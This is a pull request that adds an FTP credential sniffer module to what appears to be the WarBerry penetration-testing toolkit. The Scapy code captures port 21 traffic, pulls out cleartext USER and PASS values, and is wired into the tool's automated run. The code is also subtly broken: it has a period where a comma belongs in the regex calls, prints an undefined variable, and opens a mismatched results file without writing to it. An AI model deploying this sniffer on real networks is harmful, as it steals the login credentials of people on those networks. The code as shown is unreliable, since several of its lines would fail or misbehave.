### PR TITLE
Add FTP sniffer module

### DIFF
--- a/src/core/enumeration/ftpwn.py
+++ b/src/core/enumeration/ftpwn.py
@@ -1,0 +1,24 @@
+from scapy.all import *
+from src.utils.console_colors import *
+
+def ftpSniff(pkt):
+    if os.path.isfile('../Results/ftpcreds'):
+        print bcolors.WARNING + "[!] FTP Creds Results File Exists. Previous Results will be overwritten\n " + bcolors.ENDC
+    dest = pkt.getlayer(IP).dst
+    raw = pkt.sprintf('%Raw.load%')
+    user = re.findall('(?i)USER (.*)'.raw) # username
+    passwd = re.findall('(?i)PASS (.*)'.raw) # password
+    with open('../Results/mailcreds', 'w') as mailcreds:
+        if user:
+            print("[*]Detected FTP login to: " + str(dst))
+            print("[!] User account: " + str(user[0]))
+        elif passwd:
+            print("[!] Password: " + str(passwd[0]))
+
+def ftp_creds(iface, expire):
+    print " "
+    print bcolors.OKGREEN + "      [ FTP INFO SNIFFER MODULE ]\n" + bcolors.ENDC
+    print '[*] Sniffing for %d seconds...' %expire
+    print 'Interface: %s' % iface
+    sniff(filter='tcp port 21', prn=ftpSniff, timeout=expire, iface=iface) # port 21 = FTP port
+    print bcolors.OKGREEN + "[+] " + bcolors.ENDC + "Capture Completed." + bcolors.ENDC + " Results saved at " + bcolors.OKGREEN + "../WarBerry/Results/ftpcreds!\n" + bcolors.ENDC

--- a/warberry.py
+++ b/warberry.py
@@ -62,6 +62,7 @@ from src.core.enumeration.mailowner import *
 from src.core.enumeration.os_enum import *
 from src.core.enumeration.services_enum import *
 from src.core.enumeration.wifi_enum import *
+from src.core.enumeration.ftpwn import *
 from src.core.exploits.responder_poison import *
 from src.core.enumeration.zones import *
 from src.utils.info_banners import *
@@ -156,6 +157,9 @@ v4.0                              @sec_groundzero
                 mail_creds(iface, expire)
                 with open('../Results/running_status', 'a') as status:
                     status.write("Completed sniffing mail info from packets\n")
+                ftp_creds(iface, expire)
+                with open('../Results/running_status', 'a') as status:
+                    status.write("Completed sniffing ftp info from packets\n")
                 pcap_parser()
                 hostnames(CIDR)
                 with open('../Results/running_status', 'a') as status:


### PR DESCRIPTION
Adds a module to sniff FTP credentials for the value of `expire` variable using the interface `iface` variable. The original script is available on my Github.